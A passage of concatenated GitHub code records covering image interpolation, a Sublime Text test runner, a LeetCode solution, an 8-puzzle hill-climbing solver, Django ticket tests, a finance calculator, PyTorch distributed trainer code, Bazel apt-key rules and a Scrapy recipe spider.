range_tmp:\n result[2][i][j]+=source[i//4+k-1][j//4+w-1]*weight(i/4-(i//4+k-1))*weight(j/4-(j//4+w-1))\n else:\n result[0][i][j]=source[i//4][j//4]\n result[1][i][j]=source[i//4][j//4]\n result[2][i][j]=source[i//4][j//4]\n result[0]=result[0].astype(np.uint8)\n cv.imwrite(filename+\"_nearest.bmp\",result[0])\n result[1]=result[1].astype(np.uint8)\n cv.imwrite(filename+\"_Bilinear.bmp\",result[1])\n result[2]=result[2].astype(np.uint8)\n cv.imwrite(filename+\"_Bicubic.bmp\",result[2])\n\nimg1=cv.imread(\"lena.bmp\")\nimg2=cv.imread(\"elain1.bmp\")\nimg_lena_shear,img_elain_shear,img_lena_rotate,img_elain_rotate=np.zeros((512,512)),np.zeros((512,512)),np.zeros((512,512)),np.zeros((512,512))\nfor i in range(512):\n for j in range(512):\n if math.floor(i+0.5*j)<512:\n img_lena_shear[math.floor(i+0.5*j)][j]=img1[i][j][0]\n img_elain_shear[math.floor(i+0.5*j)][j]=img2[i][j][0]\nimg_lena_shear=img_lena_shear.astype(np.uint8)\nzoom(img_lena_shear,\"lena_shear\")\nimg_elain_shear=img_elain_shear.astype(np.uint8)\nzoom(img_elain_shear,\"elain_shear\")\na,b=math.cos(math.pi/6),math.sin(math.pi/6)\nT=np.array([[a,b,0],[-b,a,0],[0,0,1]])\nT=np.linalg.inv(T)\nfor i in range(512):\n for j in range(512):\n A=np.dot(np.array([i-256,j-256,1]),T)+np.array([256,256,0])\n A=A.astype(np.int)\n if A[0]>0 and A[0]<512 and A[1]>0 and A[1]<512:\n img_lena_rotate[i][j]=img1[A[0]][A[1]][0]\n img_elain_rotate[i][j]=img2[A[0]][A[1]][0]\nimg_lena_rotate=img_lena_rotate.astype(np.uint8)\nzoom(img_lena_rotate,\"lena_rotate\")\nimg_elain_rotate=img_elain_rotate.astype(np.uint8)\nzoom(img_elain_rotate,\"elain_rotate\")","repo_name":"KezhiAdore/Digital_Image_Processing","sub_path":"1.图像插值/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"7502619036","text":"import sublime\nimport sublime_plugin\n\nimport os\n\n\ndef find_project_path(path):\n while True:\n if not path or os.path.exists(os.path.join(path,\n 'Vintageous.sublime-project')):\n return path\n\n path = os.path.dirname(path)\n\n\nclass RunTestsForActiveViewCommand(sublime_plugin.WindowCommand):\n '''\n Runs tests:\n\n - from a file with the name 'test_' if it exists,\n - from a file with the .cmd-test[-solo] extension,\n - else, from the active file.\n '''\n\n def run(self):\n v = self.window.active_view()\n if v is None:\n return\n\n proj_path = find_project_path(v.file_name())\n if not proj_path or not v.file_name().endswith(('.py', '.cmd-test', '.cmd-test-solo')):\n print(\n 'Vintageous (Dev): Not a project, cmd-test or python file: '\n + v.file_name())\n return\n\n # If it's a test_* file, run it.\n if os.path.basename(v.file_name()).startswith('test_'):\n self.window.run_command('run_vintageous_tests', {\n 'active_file_only': True,\n 'working_dir': proj_path\n })\n return\n\n # If it's a normal file, try to find its tests.\n tail = os.path.join('tests', v.file_name()[len(proj_path) + 1:])\n full = os.path.join(proj_path, os.path.dirname(tail),\n 'test_' + os.path.basename(tail))\n if os.path.exists(full):\n self.window.run_command('run_vintageous_tests', {\n 'loader_pattern': os.path.basename(full),\n 'working_dir': proj_path\n })\n return\n\n # Otherwise just run it.\n self.window.run_command('run_vintageous_tests', {\n 'active_file_only': True,\n 'working_dir': proj_path\n })\n\n\nclass RunAllTestsCommand(sublime_plugin.WindowCommand):\n '''This command only exists because we can't expand ${project_path}\n in keymap files.\n '''\n def run(self):\n v = self.window.active_view()\n if v is None:\n return\n\n self.window.run_command('run_vintageous_tests', {\n 'working_dir': find_project_path(v.file_name())\n })\n","repo_name":"guillermooo/Vintageous","sub_path":"dev_cmds.py","file_name":"dev_cmds.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":1641,"dataset":"github-code","pt":"72"} +{"seq_id":"40438131779","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-10-07 00:25:24\n# @Last Modified time: 2016-10-07 00:35:49\n# @FileName: 139.py\n\n\nclass Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: Set[str]\n :rtype: bool\n \"\"\"\n dic = {}\n\n def dfs(start):\n if start >= len(s):\n return True\n \n if start not in dic:\n for word in wordDict:\n k = len(word)\n for j in range(len(word)):\n if start + j < len(s) and word[j] == s[start + j]:\n k -= 1\n if k == 0 and dfs(start + len(word)):\n dic[start] = True\n return dic[start]\n dic[start] = False\n return False\n return dic[start]\n \n # dfs(0)\n # print dic\n return dfs(0)","repo_name":"LichAmnesia/LeetCode","sub_path":"python/139.py","file_name":"139.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28038469181","text":"import random\nimport time\n\n\nclass EightPuzzle:\n def __init__(self):\n #self.values = [0,1,3,4,2,5,7,8,6]\n self.values = [8,1,3,4,0,2,7,6,5]\n self.previousValues = []\n self.currentPossibleMoves = []\n self.emptySquarePosition = -1\n self.fitness = -1\n\n self.updateState()\n\n def updateState(self):\n self.emptySquarePosition = self.values.index(0)\n self.getPossibleMoves()\n # DO this\n self.getCurrentStateFitness()\n\n def generateRandomPuzzle(self):\n valuesList = list(range(9))\n random.shuffle(valuesList)\n self.values = valuesList\n print(self.values)\n\n def printCurrentPuzzle(self):\n print('_______________________________________________________________')\n print ('|' + str(self.values[0]) + '|' + str(self.values[1]) + '|' + str(self.values[2]) + '|')\n print ('|' + str(self.values[3]) + '|' + str(self.values[4]) + '|' + str(self.values[5]) + '|')\n print ('|' + str(self.values[6]) + '|' + str(self.values[7]) + '|' + str(self.values[8]) + '|')\n\n def getPossibleMoves(self):\n if self.emptySquarePosition == 0:\n self.currentPossibleMoves = ['right', 'down']\n elif self.emptySquarePosition == 1:\n self.currentPossibleMoves = ['left', 'right', 'down']\n elif self.emptySquarePosition == 2:\n self.currentPossibleMoves = ['left', 'down']\n elif self.emptySquarePosition == 3:\n self.currentPossibleMoves = ['right', 'up', 'down']\n elif self.emptySquarePosition == 4:\n self.currentPossibleMoves = ['left','right', 'up', 'down']\n elif self.emptySquarePosition == 5:\n self.currentPossibleMoves = ['left', 'up', 'down']\n elif self.emptySquarePosition == 6:\n self.currentPossibleMoves = ['right', 'up']\n elif self.emptySquarePosition == 7:\n self.currentPossibleMoves = ['left','right', 'up']\n elif self.emptySquarePosition == 8:\n self.currentPossibleMoves = ['left', 'up']\n\n def moveUp(self):\n if 'up' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition - 3]\n self.values[self.emptySquarePosition - 3] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def moveDown(self):\n if 'down' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition + 3]\n self.values[self.emptySquarePosition + 3] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def moveLeft(self):\n if 'left' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition - 1]\n self.values[self.emptySquarePosition - 1] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def moveRight(self):\n if 'right' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition + 1]\n self.values[self.emptySquarePosition + 1] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def move(self, selectedMove):\n if selectedMove == 'up':\n self.moveUp()\n elif selectedMove == 'down':\n self.moveDown()\n elif selectedMove == 'left':\n self.moveLeft()\n elif selectedMove == 'right':\n self.moveRight()\n\n def getCurrentStateFitness(self):\n fitness = 0\n if self.values[0] == 1:\n fitness += 1\n if self.values[1] == 2:\n fitness += 1\n if self.values[2] == 3:\n fitness += 1\n if self.values[3] == 4:\n fitness += 1\n if self.values[4] == 5:\n fitness += 1\n if self.values[5] == 6:\n fitness += 1\n if self.values[6] == 7:\n fitness += 1\n if self.values[7] == 8:\n fitness += 1\n if self.values[8] == 0:\n fitness += 1\n self.fitness = fitness\n\n def finished(self):\n if self.fitness == 9:\n return True\n else:\n return False\n\n def restoreState(self):\n self.values = list(self.previousValues)\n self.updateState()\n\n\ndef findSolutionPuzzleHillClimbing():\n startTime = time.time()\n\n puzzle = EightPuzzle()\n currentFitness = puzzle.fitness\n\n nextMove = random.choice(['up', 'down', 'left', 'right'])\n\n temperature = 100\n\n while not puzzle.finished():\n movesFitness = {'up': 0, 'down': 0, 'left': 0, 'right': 0}\n\n if puzzle.moveUp():\n movesFitness['up'] = puzzle.fitness\n puzzle.restoreState()\n\n if puzzle.moveDown():\n movesFitness['down'] = puzzle.fitness\n puzzle.restoreState()\n\n if puzzle.moveLeft():\n movesFitness['left'] = puzzle.fitness\n puzzle.restoreState()\n\n if puzzle.moveRight():\n movesFitness['right'] = puzzle.fitness\n puzzle.restoreState()\n\n found = False\n\n for move in movesFitness:\n if movesFitness[move] > currentFitness:\n currentFitness = movesFitness[move]\n nextMove = move\n found = True\n\n if found:\n puzzle.move(nextMove)\n currentFitness = puzzle.fitness\n else:\n found = False\n for move in movesFitness:\n if movesFitness[move] == currentFitness:\n nextMove = move\n found = True\n\n if found and temperature > 0:\n temperature -= 1\n puzzle.move(nextMove)\n currentFitness = puzzle.fitness\n else:\n return time.time() - startTime, puzzle.values, puzzle.fitness\n\n return time.time() - startTime, puzzle.values, puzzle.fitness\n\n\nprint(findSolutionPuzzleHillClimbing())\n","repo_name":"CristianVerdes/AI-Homework1","sub_path":"tema1.py","file_name":"tema1.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18813821557","text":"from rest_framework import status\nfrom rest_framework.test import APIClient, APITestCase\nfrom datetime import datetime, timedelta\n\nfrom events.models import Event\nfrom tickets.models import TicketAvailability, TicketReservation\nfrom tickets.serializers import TicketAvailabilitySerializer, TicketReservationRetrieveSerializer\nfrom ticket_selling.urls import API_BASE_URL\n\nclass GetTicketAvailabilityInfoTest(APITestCase):\n client = APIClient()\n\n def setUp(self):\n self.event = Event.objects.create(\n id='e8f4e683-e873-4a20-a5b1-ec3fae004f92', \n name=\"Robert 25th birthday party!\", \n start_datetime=datetime(2021, 1, 29, 18, 0)\n )\n\n self.first_ticket_type = TicketAvailability(\n id='e2273ee4-d3f0-4d76-804e-2ce9732be0c5',\n event=self.event,\n type='''Robert's mom''',\n quantity=0\n )\n\n self.second_ticket_type = TicketAvailability(\n id='e82501a1-f0ff-43e2-88cb-6c09f85086f8',\n event=self.event,\n type='''Robert's colleagues''',\n quantity=15\n )\n\n def test_get_info_about_tickets_availability(self):\n response = self.client.get(f'/{API_BASE_URL}events/{self.event.pk}/tickets/')\n queryset = TicketAvailability.objects.all()\n serializer = TicketAvailabilitySerializer(queryset, many=True)\n self.assertEqual(response.data, serializer.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass ReserveTicketTest(APITestCase):\n client = APIClient()\n\n def setUp(self):\n self.event = Event.objects.create(\n id='e8f4e683-e873-4a20-a5b1-ec3fae004f92', \n name=\"Robert 25th birthday party!\", \n start_datetime=datetime(2021, 1, 29, 18, 0)\n )\n\n self.ticket_type = TicketAvailability.objects.create(\n id='e82501a1-f0ff-43e2-88cb-6c09f85086f8',\n event=self.event,\n type='''Robert's colleagues''',\n quantity=15\n )\n\n self.sold_ticket_type = TicketAvailability.objects.create(\n id='e2273ee4-d3f0-4d76-804e-2ce9732be0c5',\n event=self.event,\n type='''Robert's mom''',\n quantity=0\n )\n\n self.reserved_ticket = TicketReservation.objects.create(\n event=self.event,\n ticket_type=self.sold_ticket_type.type,\n )\n\n def test_making_reservation(self):\n from django.contrib.auth.models import User\n user = User.objects.create_superuser('john', 'lennon@thebeatles.com', 'johnpassword')\n\n base_quantity = self.ticket_type.quantity\n self.client.force_login(user=user)\n data = {\n \"event_id\": self.event.pk,\n \"ticket_type\": self.ticket_type.type\n }\n response = self.client.post(f'/{API_BASE_URL}tickets/', data=data)\n\n self.ticket_type.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(self.ticket_type.quantity, base_quantity - 1)\n\n def test_sold_ticket_reservation(self):\n from django.contrib.auth.models import User\n user = User.objects.create_superuser('john', 'lennon@thebeatles.com', 'johnpassword')\n\n self.client.force_login(user=user)\n data = {\n \"event_id\": self.event.pk,\n \"ticket_type\": self.sold_ticket_type.type\n }\n\n response = self.client.post(f'/{API_BASE_URL}tickets/', data=data)\n\n self.ticket_type.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n self.assertEqual(self.sold_ticket_type.quantity, 0)\n\n def test_get_info_about_reservation(self):\n response = self.client.get(f'/{API_BASE_URL}tickets/{self.reserved_ticket.id}/')\n serializer = TicketReservationRetrieveSerializer(self.reserved_ticket)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, serializer.data)\n","repo_name":"noxITRS/ticket_selling","sub_path":"ticket_selling/tickets/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40187251530","text":"\nclass User(object):\n def __init__(self,name=None,mail=None,wishes=None):\n self.name = name\n self.mail = mail\n if wishes is not None:\n self.wishes = [v.strip() for v in wishes]\n else:\n self.wishes = wishes\n def __repr__(self):\n return \"Name: {0}\\nMail: {1}\\nWishes: {2}\".format(\\\n self.name,self.mail,self.wishes)\n \n def __str__(self):\n return self.__repr__()\n \ndef get_users(filename: str):\n \"\"\"\n Return a ditc of the information from users file\n \"\"\"\n users = []\n with open(filename, mode='r', encoding='utf-8') as contacts_file:\n for i,a_contact in enumerate(contacts_file):\n if i == 0 or (a_contact.strip() == ''):\n # skip the first line\n continue\n #Name,UserName,Mail,Password,OldPassword\n fields = a_contact.split(',')\n user = User(name=fields[0],mail=fields[1].strip(),wishes=fields[2:])\n users.append(user)\n \n return users\n\ndef save_users(filename: str,users: list):\n \"\"\"\n Save the users into a csv format\n \"\"\"\n\n with open(filename,mode='w+') as f:\n f.write('Name,Mail,Wishes\\n')\n for u in users: \n message = \"\"\n for v in u.wishes:\n message += v+','\n f.write(f'{u.name},{u.mail},{message[:-1]}'+'\\n')","repo_name":"minaessam2015/Secret-Santa-Game","sub_path":"User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31896257354","text":"#request user to select investment or bond\r\n#researched how to get python to ignore capitalziation therefore created variables for each option\r\n#used if statement for both selections\r\n#in each selection included the criteria\r\n#used nested if statement if the user selected compound or simple interest\r\n#for simple interest reasearched the net and swopped the formula around to divide interest by 100\r\n#else if statement included if user selected compound interest\r\n#else if statement used if user selecetd bond\r\n#multiplied interest_rate by (1/12) since interest calc should be monthly\r\n#else statement should the user make an incorrect selection\r\n\r\n\r\n\r\nimport math\r\n\r\ninput_type=input(\"Choose either 'investment' or 'bond' from the menu below to proceed:\\n\\ninvestment - to calculate the amount of interest you will earn on investment\\nbond - to calculate the amount you will have to pay on a home loan\\n\") \r\nstring_type1=\"investment\"\r\nstring_type2=\"Investment\"\r\nstring_type3=\"INVESTMENT\"\r\nstring_type4=\"bond\"\r\nstring_type5=\"Bond\"\r\nstring_type6=\"BOND\"\r\n\r\nif input_type.lower()==string_type1.lower() or input_type.upper()==string_type3.upper or input_type==string_type2:\r\n print(\"Thank you\")\r\n dep_amount = int(input(\"enter your deposit amount here: R \"))\r\n interest_rate = int(input(\"enter your prefered interest rate (%): \"))\r\n invest_period = int(input(\"enter your prefered investment period in years: \"))\r\n interest = input(\"enter your interest choice here simple or compound: \")\r\n if interest==\"simple\":\r\n interest_calc=round((dep_amount*interest_rate*invest_period)/100+dep_amount)\r\n print(\"The amount you will receive after {} years is R{}\".format(invest_period,interest_calc))\r\n elif interest==\"compound\":\r\n interest_calc=round(dep_amount*math.pow((1+interest_rate/100),invest_period))\r\n print(\"The amount you will receive after {} years is R{}\".format(invest_period,interest_calc))\r\nelif input_type.lower()==string_type4.lower() or input_type.upper()==string_type6.upper or input_type==string_type5:\r\n interest_rate = int(input(\"enter your prefered interest rate (%): \"))/100*(1/12)\r\n PV = int(input(\"enter the present value of the house: R \"))\r\n bond_period = int(input(\"enter number of months you plan to pay off bond: \"))\r\n repayment=round((interest_rate*PV)/(1-(1+(interest_rate))**(-bond_period)))\r\n print(\"Your monthly payment is: R{}\" .format(repayment)) \r\nelse:\r\n print(\"invalid option. please select investment or bond\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"amy786zn/Finance-Calculator","sub_path":"finance_calculator.py","file_name":"finance_calculator.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14809068009","text":"import functools\nimport time\nfrom abc import ABC, abstractmethod\n\nimport torch\n\nfrom metrics.MetricsLogger import MetricsLogger\n\n\nclass TrainerBase(ABC):\n BATCH_LEVEL_METRIC = \"batch_level_metric\"\n BATCH_ALL = \"batch_all\"\n FORWARD_METRIC = \"forward_metric\"\n FORWARD_PASS = \"forward_pass\"\n BACKWARD_METRIC = \"backward_metric\"\n BACKWARD = \"backward\"\n\n def __init__(self, rank):\n r\"\"\"\n Inits TrainerBase class.\n Args:\n rank (int): worker rank\n \"\"\"\n self.__metrics_logger = MetricsLogger(rank)\n\n @abstractmethod\n def train(self):\n r\"\"\"\n A method to be implemented by child class that will train a neural network.\n \"\"\"\n return\n\n def record_start(self, type, key, name, cuda=True):\n r\"\"\"\n A method that records the start event for a metric.\n Args:\n type (str): group id for metric\n key (str): unique id for metric within a group\n name (str): description of the metric\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n self.__metrics_logger.record_start(type, key, name, cuda)\n\n def record_end(self, type, key):\n r\"\"\"\n A method that records the end event for a metric.\n Args:\n type (str): group id for metric\n key (str): unique id for metric within a group\n \"\"\"\n self.__metrics_logger.record_end(type, key)\n\n def record_batch_start(self, key, cuda=True):\n r\"\"\"\n A helper method that records a batch metric for the\n given key. A user should call this at the start of an\n iteration step during training.\n Args:\n key (str): unique id for metric within a group\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n self.__metrics_logger.record_start(\n self.BATCH_LEVEL_METRIC, key, self.BATCH_ALL, cuda\n )\n\n def record_batch_end(self, key):\n r\"\"\"\n A helper method that records a batch metric for the\n given key. A user should call this at the end of an\n iteration step during training.\n Args:\n key (str): unique id for metric within a group\n \"\"\"\n self.__metrics_logger.record_end(self.BATCH_LEVEL_METRIC, key)\n\n def record_forward_start(self, key, cuda=True):\n r\"\"\"\n A helper method that records a forward metric\n for the given key. A user should call this before\n their neural network forward.\n Args:\n key (str): unique id for metric within a group\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n self.__metrics_logger.record_start(\n self.FORWARD_METRIC, key, self.FORWARD_PASS, cuda\n )\n\n def record_forward_end(self, key):\n r\"\"\"\n A helper method that records a forward metric\n for the given key. A user should call this after their\n neural network forward.\n Args:\n key (str): unique id for metric within a group\n \"\"\"\n self.__metrics_logger.record_end(self.FORWARD_METRIC, key)\n\n def record_backward_start(self, key, cuda=True):\n r\"\"\"\n A helper method that records a backward metric\n for the given key. A user should call this before\n their .backward() call.\n Args:\n key (str): unique id for metric within a group\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n self.__metrics_logger.record_start(\n self.BACKWARD_METRIC, key, self.BACKWARD, cuda\n )\n\n def record_backward_end(self, key):\n r\"\"\"\n A helper method that records a backward metric\n for the given key. A user should call this after\n .backward().\n Args:\n key (str): unique id for metric within a group\n \"\"\"\n self.__metrics_logger.record_end(self.BACKWARD_METRIC, key)\n\n @staticmethod\n def methodmetric(name, type=\"method_metric\", cuda=True):\n r\"\"\"\n A decorator that records a metric for the decorated method.\n Args:\n name (str): description of the metric\n type (str): group id for metric\n cuda (bool): indicator to determine if this is a CUDA metric\n \"\"\"\n\n def decorator(function):\n @functools.wraps(function)\n def wrapper(self, *args):\n key = time.time()\n self.__metrics_logger.record_start(type, key, name, cuda)\n result = function(self, *args)\n self.__metrics_logger.record_end(type, key)\n return result\n\n return wrapper\n\n return decorator\n\n def get_metrics(self):\n r\"\"\"\n A method that returns metrics captured by the __metrics_logger.\n \"\"\"\n return self.__metrics_logger.get_processed_metrics()\n\n def clear_metrics(self):\n r\"\"\"\n A method that clears __metrics_logger recorded metrics.\n \"\"\"\n return self.__metrics_logger.clear_metrics()\n\n\nclass DdpTrainer(TrainerBase):\n def __init__(\n self,\n process_group,\n use_cuda_rpc,\n server_rref,\n backend,\n epochs,\n preprocess_data,\n create_criterion,\n create_ddp_model,\n hook_state_class,\n hook,\n iteration_step,\n ):\n r\"\"\"\n A trainer that implements a DDP training algorithm using a simple hook that performs allreduce\n using the process_group implementation.\n Args:\n process_group (ProcessGroup): distributed process group\n use_cuda_rpc (bool): indicator for CUDA RPC\n server_rref (RRef): remote reference to the server\n backend (str): distributed communication backend\n epochs (int): epoch count for training\n preprocess_data (function): preprocesses data passed\n to the trainer before starting training\n create_criterion (function): creates a criterion to calculate loss\n create_ddp_model (function): creates a ddp model for the trainer\n hook_state_class (class): class that will be used to keep tracking of state\n during training.\n hook (function): ddp communication hook\n iteration_step (function): will perform 1 step of training\n \"\"\"\n super().__init__(process_group.rank())\n self.process_group = process_group\n self.use_cuda_rpc = use_cuda_rpc\n self.server_rref = server_rref\n self.backend = backend\n self.epochs = epochs\n self.preprocess_data = preprocess_data\n self.create_criterion = create_criterion\n self.create_ddp_model = create_ddp_model\n self.hook_state_class = hook_state_class\n self.hook = hook\n self.iteration_step = iteration_step\n\n self.rank = process_group.rank()\n self.trainer_count = process_group.size()\n\n def epoch_key(self, epoch, index):\n r\"\"\"\n A method that returns an encoded key that represents the current epoch and\n iteration index.\n Args:\n epoch (int): epoch index\n index (int): iteration index\n \"\"\"\n return f\"{epoch},{index}\"\n\n def train(self, model, data):\n r\"\"\"\n A method that implements the training algorithm.\n Args:\n model (nn.Module): neural network model\n data (list): training examples\n \"\"\"\n model = model.cuda(self.rank)\n data = self.preprocess_data(self.rank, data)\n criterion = self.create_criterion(self.rank)\n ddp_model, hook_state = self.create_ddp_model(\n self, self.rank, model, self.process_group, self.hook_state_class, self.hook\n )\n optimizer = torch.optim.SGD(ddp_model.parameters(), 1e-4)\n\n for epoch in range(self.epochs):\n if epoch % 5 == 0 and self.rank == 0:\n print(f\"train epoch={epoch}\")\n for index, batch in enumerate(data):\n self.iteration_step(\n self,\n ddp_model,\n criterion,\n optimizer,\n hook_state,\n epoch,\n index,\n batch,\n )\n torch.cuda.synchronize(self.rank)\n","repo_name":"pytorch/pytorch","sub_path":"benchmarks/distributed/rpc/parameter_server/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"72229627753","text":"load(\"//container:container.bzl\", _container = \"container\")\nload(\"//docker/util:run.bzl\", _extract = \"extract\")\n\ndef _impl(\n ctx,\n name = None,\n keys = None,\n image_tar = None,\n gpg_image = None,\n output_executable = None,\n output_tarball = None,\n output_layer = None,\n output_digest = None,\n output_config = None,\n output_config_digest = None):\n \"\"\"Implementation for the add_apt_key rule.\n\n Args:\n ctx: The bazel rule context\n name: str, overrides ctx.label.name\n keys: File list, overrides ctx.files.keys\n image_tar: File, overrides ctx.file.image\n gpg_image: File, overrides ctx.file.gpg_image\n output_executable: File to use as output for script to load docker image,\n overrides ctx.outputs.executable\n output_tarball: File, overrides ctx.outputs.out\n output_layer: File, overrides ctx.outputs.layer\n output_digest: File, overrides ctx.outputs.digest\n output_config: File, overrides ctx.outputs.config\n output_config_digest: File, overrides ctx.outputs.config_digest\n \"\"\"\n name = name or ctx.label.name\n keys = keys or ctx.files.keys\n image_tar = image_tar or ctx.file.image\n gpg_image = gpg_image or ctx.file.gpg_image\n output_executable = output_executable or ctx.outputs.build_script\n output_tarball = output_tarball or ctx.outputs.out\n output_layer = output_layer or ctx.outputs.layer\n output_digest = output_digest or ctx.outputs.digest\n output_config = output_config or ctx.outputs.config\n output_config_digest = output_config_digest or ctx.outputs.config_digest\n\n # First build an image capable of adding an apt-key.\n # This requires the keyfile and the \"gnupg package.\"\n\n # If the user specified an alternate base for this, use it.\n # Otherwise use the same base image we want the key in.\n\n if gpg_image == None:\n gpg_image = image_tar\n\n key_image = \"%s.key\" % name\n key_image_output_executable = ctx.actions.declare_file(\"%s\" % key_image)\n key_image_output_tarball = ctx.actions.declare_file(\"%s.tar\" % key_image)\n key_image_output_layer = ctx.actions.declare_file(\"%s-layer.tar\" % key_image)\n key_image_output_digest = ctx.actions.declare_file(\"%s.digest\" % key_image)\n key_image_output_config = ctx.actions.declare_file(\"%s.json\" % key_image)\n key_image_output_config_digest = ctx.actions.declare_file(\"%s.json.sh256\" % key_image)\n\n key_image_result = _container.image.implementation(\n ctx,\n name = key_image,\n base = gpg_image,\n directory = \"/gpg\",\n files = keys,\n output_executable = key_image_output_executable,\n output_tarball = key_image_output_tarball,\n output_layer = key_image_output_layer,\n output_digest = key_image_output_digest,\n output_config = key_image_output_config,\n output_config_digest = key_image_output_config_digest,\n )\n\n commands = [\n \"apt-get update\",\n \"apt-get install -y -q gnupg\",\n # Put keys in a special directory and use glob.\n \"for file in /gpg/*; do apt-key add \\\\$file; done\",\n ]\n extract_file_name = \"/etc/apt/trusted.gpg\"\n extract_file_out = ctx.actions.declare_file(name + \"-trusted.gpg\")\n\n _extract.implementation(\n ctx,\n name = name,\n image = key_image_output_tarball,\n commands = commands,\n extract_file = extract_file_name,\n output_file = extract_file_out,\n script_file = ctx.actions.declare_file(name + \".build\"),\n )\n\n # Build the final image with additional gpg keys in it.\n\n return _container.image.implementation(\n ctx,\n name = name,\n base = image_tar,\n directory = \"/etc/apt/trusted.gpg.d/\",\n files = [extract_file_out],\n output_executable = output_executable,\n output_tarball = output_tarball,\n output_layer = output_layer,\n output_digest = output_digest,\n output_config = output_config,\n output_config_digest = output_config_digest,\n )\n\n_attrs = dict(_container.image.attrs)\n_attrs.update(_extract.attrs)\n_attrs.update({\n # Redeclare following attributes of _extract to be non-mandatory.\n \"commands\": attr.string_list(\n doc = \"Redeclared from _extract to be non-mandatory, do not set.\",\n ),\n \"extract_file\": attr.string(\n doc = \"Redeclared from _extract to be non-mandatory, do not set.\",\n ),\n \"gpg_image\": attr.label(\n doc = (\"If set, keys will be pulled and installed in the given image,\" +\n \"the result of this installation will then be transfered to\" +\n \"the image passed as base\"),\n allow_single_file = True,\n ),\n \"keys\": attr.label_list(\n allow_files = True,\n doc = \"List of keys (each, a file target) to be installed in the container.\",\n mandatory = True,\n ),\n \"output_file\": attr.string(\n doc = \"Redeclared from _extract to be non-mandatory, do not set.\",\n ),\n})\n\n_outputs = _container.image.outputs\n\n# Export add_apt_key rule for other bazel rules to depend on.\nkey = struct(\n attrs = _attrs,\n outputs = _outputs,\n implementation = _impl,\n cfg = _container.image.cfg,\n)\n\nadd_apt_key = rule(\n attrs = key.attrs,\n outputs = key.outputs,\n implementation = key.implementation,\n toolchains = [\"@io_bazel_rules_docker//toolchains/docker:toolchain_type\"],\n executable = True,\n cfg = key.cfg,\n)\n","repo_name":"bazelbuild/rules_docker","sub_path":"docker/package_managers/apt_key.bzl","file_name":"apt_key.bzl","file_ext":"bzl","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","stars":1059,"dataset":"github-code","pt":"72"} +{"seq_id":"33989001951","text":"import scrapy\n\nclass NdtvRecipeSpider(scrapy.Spider):\n\tname = 'v5rp/la-biryaneez-chalet'\n\tstart_urls = ['http://food.ndtv.com/recipes/chicken-recipes']\n\n\tdef parse(self,response):\n\t\tfor title in response.css('li.main_image'):\n\t\t\tlink = title.css('a::attr(\"href\")').extract_first().rstrip() \n\t\t\tyield scrapy.Request(link, callback=self.parse_attr)\n\t\tfor links in response.css('span.pagination'):\n\t\t\tprint(links.css('a::text').extract_first())\n\t\t\tif(links.css('a::text').extract_first() == 'Next »'):\n\t\t\t\tyield response.follow(links.css('a::attr(\"href\")').extract_first(),self.parse)\n\n\tdef parse_attr(self,response):\n\t\tingredients = response.css('div.keyword_tag')\n\t\tfor ingredient in ingredients.css('a::text'):\n\t\t\tprint(ingredient.extract())\n\t\t\tyield {'ingredient' : ingredient.extract()}\n","repo_name":"alter-sachin/pythonscraper","sub_path":"ndtvRecipeScrapper.py","file_name":"ndtvRecipeScrapper.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5181001091","text":"import os\nimport glob\nimport time\nimport asyncio\nimport logging\nimport kubism\n\ndeploy = kubism.deploy\n\n\nclass temp_server(deploy.Server):\n\n\n def __init__(self):\n super().__init__()\n self._Temp_C = None\n self.map_attr('Temp_C', 'Temp_F')\n print('Setting Callback')\n self.set_callback(self.respond_temp)\n\n\n async def respond_temp(self, *args):\n temp_c, 